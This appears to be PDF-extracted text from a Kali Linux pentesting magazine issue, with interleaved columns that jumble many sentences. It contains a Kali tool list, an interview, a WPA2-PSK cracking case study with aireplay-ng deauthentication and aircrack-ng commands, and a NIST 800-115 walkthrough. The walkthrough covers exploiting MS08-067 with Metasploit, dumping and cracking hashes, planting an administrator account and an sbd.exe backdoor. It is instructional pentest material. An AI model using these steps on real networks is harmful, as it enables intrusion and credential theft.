or some report-writing word-processing software. affcrypto cisco-ocs
G.I.M.P. or some other screen-capture and im- affdiskprint cisco-torch
age-editing software for capturing the evidence affinfo clang
from the other tools. affsign clang++
EtherApe there isnt any other tool that gives affstats cmospwd
such a good visual idea of network traffic by proto- affuse copy-router-config
affverify cowpatty
affxml creepy
Aircrack-ng crunch
alive6 cryptcat
android-sdk cudahashcat-plus
apache2 cutycapt
apache-users cymothoa
apktool darkstat
arachni_web davtest
arduino dbd
armitage dbpwaudit
arping dc3dd
asleap dc3dd
autopsy dcfldd
baksmali dcfldd
bbqsql ddrescue
bed deblaze
Figure 16. Kali Install BeEF denial
beef detect_sniffer6
binwalk detect-new-ip6
blindelephant dex2jar
blkcat dff
blkls dhcpig
blkstat dictstat
bluelog dirb
bluemaho dirbuster
blueranger dmitry
braa dnmap-client
btscanner dnmap-server
bulk_extractor dns2tcpc
bully dns2tcpd
burpsuite dnschef
cachedump dnsdict6
Figure 17. EtherApe cadaver dnsenum

dnsmap fping kismet openvas initial setup
dnsrecon fragmentation6 lbd openvas-gsd
dnsrevenum6 fragroute Lsadump ophcrack
dnsspoof fragrouter lynis ophcrack-cli
dnstracer fsstat macchanger oscanner
dnswalk ftest macof owasp-zap
dos-new-ip6 fuzz_ip6 mactime-sleuthkit p0f
Dradis galleta magicrescue padbuster
dradis genkeys magictree paracite6
driftnet genpmk mailsnarf paros
dsniff giskismet maltego pasco
eapmd5pass grabber maskgen passive_discovery6
edb-debugger guymager md5deep patator
enumiax hamster mdb-export pdf-parser
ettercap-graphical hashcat mdb-hexdump pdgmail
evilgrade hash-identifier mdb-parsecsv peepdf
ewfacquire hexinject mdb-sql pev
ewfacquirestream hexorbase mdb-tables phrasendrescher
ewfexport hfind mdk3 pipal
ewfverify hping3 medusa plecost
exploit6 HTTP merge-router-config policygen
extundelete hydra metagoofil powerfuzzer
fake_advertise6 hydra-gtk metasploit framework powersploit
fake_dhcps6 icat-sleuthkit miranda protos-sip
fake_dns6d ifind miredo proxychains
fake_dnsupdate6 ikat missidentify proxystrike
fake_mipv6 ike-scan mitmproxy proxytunnel
fake_mld26 ils-sleuthkit mmcat ptunnel
fake_mld6 img_cat mmls pwdump
fake_mldrouter6 implementation6 mmstat pwnat
fake_router26 implementation6d msgsnarf pyrit
fake_router6 intersect multiforcer rabin2
fake_solicitate6 intrace MySQL radare2
fang inundator mysql radiff2
fcrackzip inverse_lookup6 nbtscan rafind2
fern-wifi-cracker inviteflood ncat ragg2
ferret iodine ncrack ragg2-cc
ffind irpass-cdp netdiscover rahash2
fierce istat netmask rainbowcrack
fiked jad netsniff-ng randicmp6
fimap javasnoop NFC Tools rarun2
findmyhash jaxflood nikto rasm2
flasm jboss-autopwn-linux nmap rax2
flood_advertise6 jboss-autopwn-win nmap * rcracki_mt
flood_dhcpc6 jcat oclhashcat-lite readpst
flood_mld26 jigsaw oclhashcat-plus reaver
flood_mld6 jls ohrwurm rebind
flood_mldrouter6 john (the ripper) ollydbg recordmydesktop
flood_router26 johnny onesixtyone recoverjpeg
flood_router6 joomscan OpenVAS redir6
flood_solicitate6 keepnote openvas reglookup
fls keimpx openvas check setup responder
foremost kill_router6 openvas feed update responder

TOOLS
RFIDiot ACG sslstrip wifiarp yersinia
RFIDiot FROSCH sslyze wifidns ywofi
RFIDiot PCSC stunnel4 wifi-honey zbassocflood
rifiuti sucrack wifiping zbdsniff
rifiuti2 svcrack wifitap zbdump
rsmangler svcrash wifite zbfind
rsmurf6 svmap wireshark zbgoodfind
rtpbreak svreport wol-e zbreplay
rtpflood svwar wpscan zbstumbler
rtpinsertsound swaks xprobe2 zenmap
rtpmixsound t50 xsser
safecopy tcpflow
samdump2 tcpreplay
sbd termineter
scalpel thcping6
scrounge_ntfs thc-pptp-bruter
sctpscan thc-ssl-dos
searchsploit theharvester
se-toolkit tlssled
sfuzz tnscmd10g
sidguesser trace6
siege truecrack
sigfind truecrypt
siparmyknife tsk_comparedir
sipcrack tsk_gettimes
sipp tsk_loaddb
sipsak tsk_recover
skipfish u3-pwn
smali ua-tester
smtp-user-enum udptunnel
smurf6 uniscan-gui
sniffjoke unix-privesc-check
snmpcheck update metasploit
socat urlcrazy
sorter urlsnarf
spike-generic_chunked vega
spike-generic_listen_tcp vinetto
spike-generic_send_tcp voiphopper
spike-generic_send_udp volafox
spooftooph volatility
sqldict w3af
sqlmap wafw00f
sqlmap * wapiti
sqlninja webacoo
sqlsus webmitm Wolf Halton
srch_strings webscarab Wolf Halton is a Senior PCI Compliance / Vulnerability Engi-
SSH webshag-gui neer, whose company, Atlanta Cloud Technology, performs
sshd webslayer penetration tests, IT audit functions and private-cloud in-
sslcaudit websploit frastructure for large financial-services organizations and
ssldump webspy the financial planning vertical. He co-authored a book on
sslh weevely computer security and penetration testing, as well as sev-
sslscan wfuzz eral articles on cloud-based security. For more information,
sslsniff whatweb email Wolf@AtlantaCloudTech.com.

U P D AT E
NOW WITH
STIG
AUDITING
IN SOME CASES
nipper studio
HAS VIRTUALLY
REMOVED
the
NEED FOR a
MANUAL AUDIT
CISCO SYSTEMS INC.
Titanias award winning Nipper Studio configuration
auditing tool is helping security consultants and end-
user organizations worldwide improve their network
security. Its reports are more detailed than those typically
produced by scanners, enabling you to maintain a higher
level of vulnerability analysis in the intervals between
penetration tests.
Now used in over 45 countries, Nipper Studio provides a

thorough, fast & cost effective way to securely audit over
100 different types of network device. The NSA, FBI, DoD
& U.S. Treasury already use it, so why not try it for free at
www.titania.com
www.titania.com
EXTRA
Interview with
Demstenes Zegarra
Rodrguez
Demstenes Zegarra Rodrguez is a Ph.D. student in Electronic
Systems at University of Sao Paulo, with solid knowledge in
Telecommunication Systems and Computer Science based on 13
years of professional experience in important companies such as,
Nokia, Microsoft, Celltick, Telefonica.
Since when have you been using Kali and What are you using it for?
what convinced you to it? In the present, I am analyzing the time period to
I have used the BackTrack Linux since 2009 and crack wireless passwords and their computation-
nowadays I am using Kali because of the secu- al efforts. As a future work, I pretend to study the
rity and testing tools association, with more than forensic tools of Kali Linux, because the focus of
300 penetration testing tools, including vulner- the distribution is the penetration testing tools, so I
ability analysis, web applications, password at- want to study if Kali Linux is a complete solution for
tacks, wireless attacks, exploitation tools, sniffing forensic purposes too.
and spoofing, reverse engineering, stress testing,
hardware hacking, forensic, and others. Which methods do you most frequently
use?
What are the positive and negative I am using a trivial wireless method with the tools
aspects of Kali you noticed? aircrack-ng, aireplay-ng, airmon-ng, and airod-
The positive aspects are that Kali has common ump-ng; but, in the next studies I will pretend to
tools as Wireshark, nmap until VoIP tools as rtp- use all the forensic tools through the Forensic
flood and sipmyknife. Then, Kali can be consid- Boot option to the operating system, using more
ered as a penetration testing platform that pro- than one method.
vides many features.
I have installed Kali Linux on some computers What difficulties might surprise a new
with no automatic support to some hardware such user? What can you advise them?
as video card, but it can be a little common in some The difficulties is only drivers support and the abil-
Debian-based distributions. ity to work with the penetration tools, because in
many cases the users have to use the association
Does Kali serve you for private or of more than one tool to have good results to dis-
professional purposes? cover vulnerabilities of softwares and hardwares.
I use Kali Linux for academic studies, to analyze
tool performances, such as attack time and effi- What can you say about the basic tools?
ciency using different wireless security protocols. The basic tools are extensively used by network
As an example, you can see a case study at the and system administrators, as nmap, Wireshark,
final of this interview. chroot, and in a lot of distributions the tools are

not installed by default. The use of basic tools are Kali Linux is definitely a success. What do
easy because the user even without much knowl- you think the future holds for the distro?
edge, can do initial testing security and intrusion Kali is a very robust and flexible penetration testing
of a quick and easy way through the terminal as distribution, which is presented in 8 different languag-
the tool nmap, for example, discovering the open es and building over 300 Debian compliant packag-
doors of servers or the tool Wireshark that can re- es. In the last years, Kalis developers (Offensive Se-
cord VoIP conversations or find worms and viruses curity) have incorporated new important features, as
on the network through anomalous traffic. a consequence the worldwide popularity is increas-
ing. For these reasons,I believe that the future of Kali
Which are the best? Which do you think is is very promissory; of course it is important to consid-
most useful? er that the Kali improvements should continue. In this
Nowadays, the use of mobile devices, such as context, developers need to work with clients, such
tablets and Android Phones are increasing, so the as banking and financial services, government en-
ARM (Advanced RISC Machine) hardware support tities, and various technology companies to under-
is very useful, because you can test your network stand real problems and offer real solutions.
security through a cellular phone, since the dispos-
itive has a minimum memory of 5 GB free space. Do you think this is the best method for
A good example of this type of use is when you penetration testing? Should something
want to be able to dump the contents of a valid be changed in Kali?
RFID card in the system in order to clone it later Sure, some studies show that Kali Linux has a
on (i.e. test a standard Mifare-based door system). better performance that other current penetration
This task could be performed in only a few min- tools. Also, as stated before, Kali offers many free
utes, and only is necessary and arm device with software applications in its main section. Because
the Kali Linux, a NFC tool and a SD card. of the different levels of users knowledge in net-
working or OS, Kali tools could improve his instal-
Do you know any of Kalis unconventional lation process. Also, the interface could be im-
use? proved using some usability criteria.
The use of Kali on the cellular Phone where the
person began to discover insecurity holes in ac- Have you read our first issue of Kali Linux?
cess points of a University campus. This is not un- Which of the methods described therein
conventional but it is interesting that with a mobile are you most interested in?
dispositive you can have a powerful tool. Yes, I read the Pentesting Wireless with Kali Linux
and the Kali Linux on a Raspberry Pi, both meth-
Who would you recommend it to? ods are very interesting.
The use of Backtrack is used and recommended in
many University and Midsize companies in Brazil, and What do you think about the future of
now it is been migrated for Kali Linux. In general, Kali pentesting?
Linux is recommended to be used for any person, who The advances in technology with new solutions in
has interest to know how safe her/his network is. different areas will bring new security vulnerabili-
ties. Solutions are more complex and the security
Do your friends, including IT specialists, aspects are generally not developed/implemented
also have a positive opinion about Kali? in detail because the services need to be rolled out
Yes, some colleagues working as IT specialists had in the market as soon as possible. These facts will
a good quality of experience using Kali-Linux, basi- expand the vulnerability of security considerably,
cally because its flexibility and high number of tools. especially on the web and mobile market.
The majority of tools included in Kali are already
used by IT specialists, and to have a open source To conclude, can you describe the method
distribution with a suite of security and penetra- you have used?
tion tools is very useful. The forensic tools are al- I used a method of trivial pentesting wireless us-
ready used too because after the use of the foren- ing aircrack-ng, aireplay-ng, airmon-ng, and airo-
sic boot, do not have traces of their use, that is, a dump-ng. However, Kali has a lot of tools that can
computer can be analyzed without risk of damage be used in association to the same proposal.
and insertion of new information. By PenTest Team

EXTRA
Case Study: Analysis of

Security and Penetration Tests
for Wireless Networks
with Kali Linux
T
he use of wireless networks has been in- (PSK). The PSK is designed for use on home and
creasing because of the devices costs and small office networks in which each the user has
the advantages of mobility. The focus of the same pass phrase. WPA-PSK is also called
this study is to perform penetration tests through WPA-Personal.
a Linux distribution, Kali, which has a collection of Kali was installed in a virtual machine of 1 GB
security and forensics tools. Penetration tests are RAM and HDD 50 GB (about 15 minutes of instal-
done in real networks using the WPA2-PSK pro- lation), but it can be launched directly from a CD or
tocol. removable media without installing to disk.
There are so much software solutions that work The procedure (commands) bellow work to break
to discover the password of the wireless network. a WPA2-PSK protocol with Kali Linux; in the case
All software solutions can be found together in a of BackTrack the commands are similar [2].
Linux distribution, which is the case of BackTrack
and Kali Linux Distribution. airmon-ng stop wlan0.
Kali Linux [1] is a Debian-derived Linux distribution airmon-ng start wlan0.
and it is the enterprise-ready version of BackTrack airodump-ng --channel 6 --write fileWPA
Linux. wlan0. The fileWPA is the file name where the
captured packets will be recorded; thus, it will
generate a file fileWPA-01.cap in the current
directory. 6 is the channel used by the focused
access point.
aireplay-ng -0 1 -a 00:0A:0A:F0:B1:B1 -c
00:1A:C3:A0:C3:B2 wlan0. It is necessary to
wait to capture the handshake.
aircrack-ng -0 -w wordList.txt fileWPA-01.cap.
The command that is necessary to capture the

handshake sends a faked package to the access
point, simulating the process of disconnecting the
customer specified. Mistaken by the package, the
access point disconnects the client, which causes
Figure 1. Kali Linux it to re-authenticate as a process carried out au-
The goal of this practical study is to test Kali tomatically by most operating systems. With this,
Linux in breaking a WPA2-PSK protocol. the authentication process will be recorded by the
WPA (Wi-Fi Protected Access) is a protocol for capture started at another terminal.
radio communications, designed to be used with As a consequence, it captures the sequence of
an 802.1X authentication server that assigns dif- packages to discover the passphrase of the net-
ferent keys to each user. However, it can also work, which is done through the handshake (the
be used in a less secure mode Pre-Shared Key exchange of information). Table 1 shows the re-

References
[1] http://www.kali.org
[2] Rodrguez Z. D., Rosa L. R., Sousa J., Analysis of Se-
curity and Penetration Tests for Wireless Networks
with Backtrack Linux, International Information
and Telecommunication System, 2010.
sults obtained during our experimental tests.
Table 1. Time to decrypt a WPA2-PSK

Time (hours) Wireless antenna name
08:02:31 Wireless X
09:40:11 Wireless Y
07:50:45 Wireless Z
08:34:12 Wireless T
The time necessary to have discovered the

WPA2-PSK protocol was around 8 hours using an
Intel core i5.
Years ago, the WPA2-PSK protocol was broken
in almost 1 day, today it takes 8-9 hours, it hap-
pens because the processing machine, memory,
among other factors.
Furthermore, the most interesting thing about
Kali Linux is the number of tools about security and
attack tests.
Figure 2. Tools of the Kali Linux Distribution
Demstenes Zegarra Rodrguez

Is a Ph.D. student in Electronic Systems at
University of Sao Paulo, with solid knowl-
edge in Telecommunication Systems and
Computer Science based on 13 years of
professional experience in important com-
panies such as, Nokia, Microsoft, Celltick,
Telefonica.
EXTRA 05/2013(16)
EXTRA
Mapping Kali Usage to

NIST800-115
Kali is an invaluable platform that when coupled with a sound
methodology can make a penetration testers life that much easier.
In some cases Kali provides so many tools that novice penetration
testers may struggle with how all the tools fit together and how
they can be used to truly meet a client or internal customers
penetration test objectives.
I
n this article we will try to shed some light on Penetration Testing Execution Standard
how Kali can be used with a penetration test- (PTES): Standard for penetration testing exe-
ing methodology to streamline the penetration cution along with technical guidelines.
testing process and create a stronger deliverable National Institute of Standards and Technolo-
for the client. While Kali provides a categorization gy: Guide to Security Testing and Assessment
of tools we will take this a step further and pro- (NST 800-115): Guide for conducting techni-
vide clear mapping against a standard penetra- cal security assessments. Contains guidance
tion testing methodology. Along the way we will on techniques and methods that an assessor
look at many tools from a high level as they per- should use when performing an Information
tain to the steps within the methodology. In this Security Assessment.
article we will look at the tools in a high level and
focus specifically on how to utilize the tools within While all three are good methodologies we find
a structured penetration test. We will also visit a that PTES and NIST 800-115 provide a bit more
few of our favorite tools we like to use during our flexibility during our penetration tests. Also, the
penetration tests. methodologies more closely align with whats
taught in security course curriculum such as
The Methodology SANS. For this article we will be using NIST 800-
We cant begin an article about mapping Kali to 115. Both PTES and NIST are similar so it should
a penetration testing methodology without first se-
lecting the methodology. When it comes to pen-
etration testing methodologies you can basically
narrow the field down to three. These are:
Open Source Security Testing Methodology

Manual (OSSTMM): Series of standard tests
designed to deliver results as verified facts
that provide actionable information in order to
strengthen security operations. Figure 1. NIST 800-115 Penetration Test Methodology

be easy to transition between the two. Also, the gathering (OSINT). Here is a quick breakdown of
folks over at PTES have done a fairly decent job the tools (Table 2).
mapping tools to the methodology.
Here is our 60 second overview of the four-stage Table 2. Information gathering tools
penetration testing methodology depicted within Tool / Capability Description
NIST 800-115 (Figure 1). Maltego Maltego is an open-source intelligence
and forensics application developed by
Planning Paterva. Maltego focuses on providing a
The Planning Phase is where we begin and where we library of transforms for discovery of data
will experience our first little roadblock. This phase is from open sources, and visualizing that
information in a graph format, suitable for
focused on tasks such as establishing rules of en- link analysis and data mining.
gagement, objectives, task assignment, testing man-
agement, and engagement tracking. If we break this TheHarvester The objective of this program is to gather
down further we can think in terms of project man- emails, subdomains, hosts, employee
names, open ports and banners from
agement and penetration testing documentation.
different public sources like search
Kali provides a few tools that can be used for engines, PGP key servers and SHODAN
planning and penetration testing documentation. computer database.
Here is a quick rundown of the tools as well as a
Creepy Creepy is a geolocation tool that helps
brief description (Table 1). social engineers perform successful
information gathering.
Table 1. Pentest documentation tools
Tool / Capability Description Dmitry Deepmagic Information Gathering Tool)
is a UNIX/(GNU)Linux Command Line
Dradis Open-source framework for sharing Application coded in C. Dmitry is used to
information during a penetration test. gather information such as sub-domains,
Keep-note Cross platform note taking application. email addresses, whois lookups,etc.
* Redmine Open-source web-based project Jigsaw Email enumeration tool that accesses the
management tool. Jigsaw business directory. Can also be
used to generate email addresses using
Discovery common formats.
The next step and one of the most important steps Metagoofil Information gathering tool designed
in the penetration testing methodology is discov- for extracting metadata of public
ery. The interesting thing about discovery is that its documents (pdf,doc,xls,ppt,docx,pptx,xl
sx) belonging to a target company.
a constant cycle during a penetration test. You are
typically re-engaging the discovery phase within
the Attack process to perform privilege escalation Kali has many tools we could use to meet various
or pivot and attack other systems until the objec- scanning requirements. Here is a quick table bro-
tives have been met. ken out by requirement type (Table 3).
The discovery phase consists of two parts. The
first part is information gathering and scanning. Vulnerability Analysis
During this part of the engagement the team iden- During vulnerability analysis we review informa-
tifies as much information about the company, tion gathering and scanning data to identify possi-
people, systems, services, and applications as ble attack vectors. Typically, this involves review-
possible. The second part is vulnerability analysis ing service and OS version information against
where the testing team synthesizes all the informa- online vulnerability databases. We can also iden-
tion gathered in part 1 of discovery to identify vul- tify vulnerabilities through automated tools pro-
nerabilities and possible attack vectors. The dis- vided by Kali.
covery phase is one of the most important phases Weve included a table of these tools below.
that can and should be repeated as the penetra- Please note that we did include additional tools that
tion test progresses into the Attack phase. could be installed. Keep in mind that Kali is Linux
and most things that can be installed on a Linux
Information Gathering and Scanning platform will install on Kali. Its not unusual for us to
Kali contains many tools that can be used for in- install Nessus right after installing Kali on our prima-
formation gathering and open-source intelligence ry penetration testing systems (Table 4).

EXTRA
Attack revisit the Discovery phase throughout the course
If you have done your homework during the Dis- of the penetration test (Figure 2).
covery phase then hopefully the initial part of the
Attack phase will go smoothly and successfully. In Gaining Access
this section we are going to map all the Kali tools Kali has several tools that can assist with gaining
to the different parts of the Attack phase of NIST access to systems and networks. Most people,
800-115. includiing us, will immediately launch Metasploit
Here is a summary of the Attack phase and its however there are several other tools-sets that can
various parts. Keep in mind that we will continue to be leveraged. To make things a bit more straight
Table 3. Scanning tools

Technique Tool / Capability Description
Network Discovery Fierce.pl DNS interrogation tool. Uses several techniques including DNS zone transfers,
DNS brute-force, and DNS reverse lookups.
dnsdict6 Utility used to enumerate IPv6 domains.
Fping/fping6 Ping on steroids. Has the ability to query systems via ICMP.
Network Port dnmap Distributed nmap framework with client and server components. Map hosts,
and Service ports, and services across networks.
Identification nmap Map hosts, ports, and services across networks. Also, has ability to run scripts to
identify vulnerabilities.
hping3 Hping3 is a network tool able to send custom TCP/IP packets and to display
target replies like ping program does with ICMP replies.
Wireless Discovery Kismet A 802.11 layer2 wireless network detector, sniffer, and intrusion detection
/ Scanning system.
Wireshark A network protocol analyzer for Unix and Windows.
Web Application Burpsuite An integrated platform for performing security testing of web applications.
Discovery / Webscarab A framework for analysing applications that communicate using the HTTP and
Scanning HTTPS
Nikto An Open Source (GPL) web server scanner which performs comprehensive tests
against web servers
Table 4. Vulnerability analysis tools
Technique Tool / Capability Description
Vulnerability Nmap -sC or script Switches used to initiate vulnerbility scanning with nmap.
Scanning OpenVAS Open-source vulnerability scanner. A fork of the Nessus project.
*Nessus Commercial vulnerability scanner.
Database oscanner An Oracle assessment framework developed in Java.
Vulnerability Tnscmd10g Tool used to gather information from the TNS listener port.
Scanning
Network Cisco-global-exploiter Is an advanced, simple and fast security testing tool/ exploit engine, that is able
Vulnerability to exploit 14 vulnerabilities in disparate Cisco devices.
Scanning Yersinia Is a network tool designed to take advantage of some weakeness in different
network protocols.
Web Vulnerability Arachni A Free/Open Source Web Application Security Scanner Framework.
Scanning W3af Is a Web Application Attack and Audit Framework.
Owasp-zap The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool
for finding vulnerabilities in web applications.
Fuzzing Tools bed BED (aka Bruteforce Exploit Detector) is a plain-text protocol fuzzer that checks
software for common vulnerabilities like buffer overflows, format string bugs,
integer overflows, etc.
spike API for fuzzer development written in C.

Table 5. Password Attacks Table 8. Web Attacks
Tool / Capability Description Tool / Capability Description
Hydra/gtk-hydra Network logon cracker which support Browser Exploitation A penetration testing tool that focuses on
many different services. Framework (BeEF) the web browser.
Dbpwaudit Is a Java tool that allows you to perform Sqlninja A tool targeted to exploit SQL Injection
online audits of password quality for vulnerabilities on a web application that
several database engines. uses Microsoft SQL Server as its back-end.
Cisco-audit-tool Script which scans Cisco routers for Bbqsql SQL injection exploitation tool.
common vulnerabilities
Onesixtyone Is an SNMP scanner which utilizes a forward we have broken these tools-sets out based
sweep technique to achieve very high on various attack vectors (Table 6-8).
performance.
Acccheck Script for checking default logins on Escalating Privilege
Windows. Once we have gained user level access to a sys-
John Offline dictionary and brute-force tem, 9 times out of 10 we want to escalate our privi-
cracking tool. lege to gather more sensitive information such as
Ophcrack Is a Windows Password cracker based on passwords or restricted data. We will usually per-
Rainbow Tables. form some of the same Discovery phase processes
in order to identify and exploit additional vulnerabili-
Table 6. Vulnerability Exploitation ties. You will notice that we have repeated several
Tool / Capability Description tools from previous tables however we have pro-
Metasploit Penetration testing and exploitation vided some additional description that are more rel-
framework. evant to this phase of the process (Table 9).
Searchsploit Script used to search Exploit-DB exploits.
Table 9. User-access-level discovery tools
Social Engineering An open-source Python-driven tool
Toolkit aimed at penetration testing around Tool / Capability Description
Social-Engineering. Unix-privesc- Unix-privesc-checker is a script that runs
check on Unix systems (tested on Solaris 9,
HPUX 11, Various Linuxes, FreeBSD 6.2). It
Table 7. Wireless Attacks tries to find misconfigurations that could
allow local unprivilged users to escalate
Kali Tool / Description privileges to other users or to access local
Capability apps (e.g. databases).
Aircrack-ng A 802.11 WEP and WPA-PSK keys cracking lynis An auditing tool for Unix (specialists). It
program that can recover keys once scans the system and available software,
enough data packets have been captured. to detect security issues.
Fern A Wireless security auditing and attack enum4linux A tool for enumerating information from
software program written using the Windows and Samba systems.
Python Programming Language and the
Python Qt GUI library, the program is Metasploit Penetration testing and exploitation
able to crack and recover WEP/WPA/WPS framework. Metasploit has several modules
keys and also run other network based that can assist with privilege escalation.
attacks on wireless or ethernet based Searchsploit Script used to search Exploit-DB for local
networks privilege escalation exploits.
Figure 2. NIST 800-115 Penetration Test Methodology Attack Phase

EXTRA
Table 10. System Browsing Putting It All Together
Tool / Capability Description Now lets put everything together with an example
windows-binaries Folder in Kali with multiple windows
penetration test. In this example we will sample a
exploits and binaries. few Kali tools while following the penetration test
Sbd.exe An encrypted version of netcat.
methodology discussed in NIST 800-115.
nc.exe Netcat is a computer networking service
for reading from and writing to network
Planning
connections using TCP or UDP. Netcat We begin in the planning phase of our methodol-
is designed to be a dependable back- ogy. f you are working on a larger engagement and
end device that can be used directly need a collaborative solution then Dradis is the tool
or easily driven by other programs and of choice. It provides capabilities for centralized
scripts. At the same time, it is a feature- documentation, team collaboration, and most im-
rich network debugging and investigation
tool, since it can produce almost any kind portantly the ability to import information from our
of correlation you would need and has a various tools within Kali. There are two versions
number of built-in capabilities. Netcat is of Dradis an community version and a commercial
often referred to as a Swiss-army knife version. As you can guess the version on Kali is
for TCP/IP. Its list of features includes the community version.
port scanning, transferring files, and port
listening, and it can be used as a backdoor.
Lets run through a quick example and fire up
Dradis to create our project structure. When you
Metasploit/ Exploitation framework with additional
Meterpreter modules to gather information once
first launch Dradis you will be greeted with an ini-
compromised. tialization screen. Give the server a password and
select the option to create a new project (Figure 3).
Once you login with no username and the serv-
Table 11. Install Additional Tools er password you will be dropped into the Dradis
Tool / Capability Description framework console. From there we will implement
atftpd Linux TFTP daemon that can be used to upload our penetration testing methodology and plan by
and download files from target systems.
apache Web server that can be used to deliver
additional tools to compromised host.
Reporting
Lastly, we need to take all the data from various tools
as well as our manual observations and screen-
shots to create a report. A typical penetration test
report will have two audiences. A non-technical au-
dience that needs enough details to understand the
problem and make management level decisions to
address the risk (think resources and budget) and
the technical audience who will be responsible for Figure 3. Dradis Initialization
mitigating the findings (Table 12).
Table 12. Reporting tools

Tool / Capability Description
Dradis Open-source framework for sharing
information during a penetration test.
Dradis allows you to output gathered
information in HTML and Word.
MagicTree MagicTree is a penetration tester
productivity tool. It is designed to
allow easy and straightforward data
consolidation, querying, external
command execution and (yeah!) report
generation. Figure 4. Dradis Console with NIST 800-115 Penetration Test
Methodology

adding branches and notes. Since we have a lot and more granular options such as controlling the
to cover I will leave it up to the reader to research number of threads used for execution. Here are
more on Dradis. the Fierce options along with the output from our
Within a few minutes we have mapped out our target domain. Please note that the output here
project tasks, Rules of Engagement, objectives, may not be ideal given our test domain that we are
and remaining methodology steps (Figure 4). using for this example (Figure 7).
Dradis is a great tool, but dont expect it to be a With this information in hand we can now import
full fledged project management suite. If you need the output from the tools into Dradis and move on
more firepower dont forget that Kali has a num- to scanning, enumerating services, and vulnerabil-
ber of pre-installed applications such as Ruby and ity identification.
MySQL. With this in mind youre a few steps away Once we have the completed Information Gath-
from setting up Redmine to add resource planning ering we need to start enumerating discovered net-
and Gantt charts to your Kali instance. works and services. Kali again saves the day by giv-
Now that we have our project planning and docu- ing us all the tools we need in one location. While in
mentation mechanism in place we can move on to the normal course if our engagements we would turn
the next phase of the penetration testing method-
ology and thats discovery.
Discovery
We decide to kick-off the Discovery phase by run-
ning TheHarvester. TheHarvester is written by Chris-
tian and allows us to collect information about a tar-
get organization from a variety of sources including
Google, Facebook, LinkedIn, spoke, etc. Lets take a Figure 5. TheHarvester Options
look at the TheHarvester a bit closer (Figure 5).
The screenshot shows TheHarvester options
and some example usage. In the next example
well run TheHarvester against our target domain
querying Bing. We also want to ensure we limit our
return results to 100. The command and its output
would look something like: Figure 6.
With these options selected TheHarvester will
query Bing for our domain looking for email ad-
dresses as well as additional linked domains. The
-n -t options tells TheHarvester to perform reverse
DNS lookups on the IP range identified for the do- Figure 6. TheHarvester Output
main queried as well as expand the search for our
domain across all top level domains. For example,
if out domain was nbc.com it would attempt for find
domains such as nbc.ca, nbc.biz, etc.
TheHarvester can pull together a significant amount
of information that we can use during the scanning
phase of Discovery, but in this case we decide to uti-
lize some additional tools to further our Information
Figure 7. Fierce Example
Gathering efforts prior to moving on to scanning.
At this point we decide that we want to interro-
gate DNS a bit more with the information gathered
from TheHarvester. Because of its features we Figure 8. Fping Example
have choose to run our domains through Fierce.
Fierce can initiate DNS zone transfer attempts
as well perform bruteforce lookups against DNS.
While TheHarvester can perform DNS bruteforc-
ing as well, Fierce contains added functionality Figure 9. Hping3 Example

EXTRA
to nmap, we wanted to cover a couple other lesser Next we are going to leverage nmaps vulnerabil-
known scanners starting with fping and hping3. ity scanner to check for SMB vulnerabilities on this
So using our case study we now have discov- host. First, lets quickly look at nmaps scripting pa-
ered hosts within out domain we will utilize fping to rameters (Figure 11).
identify systems on our target network (Figure 8)... If you are interested you can take a look at the scripts
Based on the output of fping we know that IC- supplied with nmap. On Kali you can find them in /
MP is enabled and that we were able to enumerate usr/share/nmap/scripts. After doing a bit of search-
our target network. Now we select one of our hosts ing we come across smb-check-vulns (Figure 12).
and perform a SYN scan with hping3 (Figure 9). After looking at nmaps documentation we find
Using our list of services we can run nmap that this script can be used to identify vulnerability
against the open ports to identify operating system conditions with SMB. We also learn that we need
and service versions (Figure 10). to supply an unsafe flag to get it to fully run our
scan. With consequences in mind and more impor-
tantly permission to impact system availability we
run our scan (Figure 13).
We have come to the end of this phase of Dis-
covery. We now have enough information to begin
the attack phase of our penetration test against our
target environment.
We have come to the end of this phase of Dis-
covery. We now have enough information to begin
Figure 10. NMAP Service Identification Example the attack phase of our penetration test against our
target environment.
Attack
Gaining Access
Now that we have identified several vulnerabilities
as well as the likelihood of exploitation we decide to
try and exploit the MS08-067 vulnerability identified
Figure 11. NMAP Script Options with our nmap scan. We leverage the Metasploit
framework to begin our initial attack vector.
Metasploit is very powerful and could be used for
various phases within our methodology. That being
said Kali provides many options that can be lever-
aged to meet our testing objectives. In this particu-
Figure 12. NMAP Script Directory lar case Metasploit provides a perfect vehicle to
exploit this particular vulnerability.
Prior to launching Metasploit we need to startup
the Postgres database and the Metasploit server
component. These are not configured to startup on
boot by default in Kali (Figure 14).
Next, we launch Metasploit console with the ms-
fconsole command. After doing an initial search
we discover that Metasploit does have an exploit
for MS08-067. We configure the exploit with the
Figure 13. NMAP smb-check-vulns Output Against Target bind shell Meterpreter payload to make us work a
Host bit harder for our objectives. Once all the options
are configured we run the exploit using the exploit
command (Figure 15).
Success! We have exploited our vulnerability
and have gained access to our system.
Figure 14. Metasploit Initialization and MSFConsole Startup

System Browsing
Now wed like to validate our access as well as
upload additional tools to gather information and
launch further attacks (Figure 16). After confirming
that we are running under the SYSTEM. We de-
cide that we should dump hashes in order to help
with attacks against other systems (Figure 17).
Figure 15. Metasploit MS08-067 Exploit With Meterpreter
Payload Once we have the hashes we can launch John
on our Kali system to crack the administrator pass-
word. On many networks the administrator account
password will be the same across all systems or
Figure 16. Meterpreter Getuid Output On Target Host
groups of systems so this will come in handy as we
continue to exploit our target network (Figure 18).
Installing Additional Tools

Once we dump hashes we decide to upload some
additional tools to pivot and launch attacks from our
compromised host. While we could download our
tool-kits using meterpreter we wanted to demon-
strate a couple of additional ways to upload tools to
our exploited host. In order to continue we drop into
a shell (Figure 19). We decide to leverage Windows
tftp.exe client to upload our tool-set. We first need to
Figure 17. Meterpreter Hashdump Output On Target Host start the tftp daemon on our Kali instance. In order
to do this we ran: Figure 20. Once our tftp server
started we downloaded sbd.exe as well as create an
administrator account, so we can get back into our
target in the future (Figure 21). Next, we launch our
Figure 18. John Usage On Kali To Crack Target Hashed backdoor using sbd.exe. Sbd is very similar to Net-
Passwords
cat however it allows us to encrypt our data channel
with a shared secret (Figure 22). We then connect
with the sdb client on our Kali machine (Figure 23).
Using this backdoor we can repeat our Discovery
process to identify additional hosts or networks and
vulnerabilities. We can also use this access to pivot
Figure 19. Meterpreter Shell Command Ouput On Target and launch attacks until our objectives are met.
Host
EXTRA
Reporting allows us to take a screen capture of the victims
Documentation is critical to the success of the desktop. Here is a screenshot from our previously
penetration test. This can be performed through compromised host (Figure 24).
screen-shots or tool output. Since we are using Once this data is input or imported into Dradis we
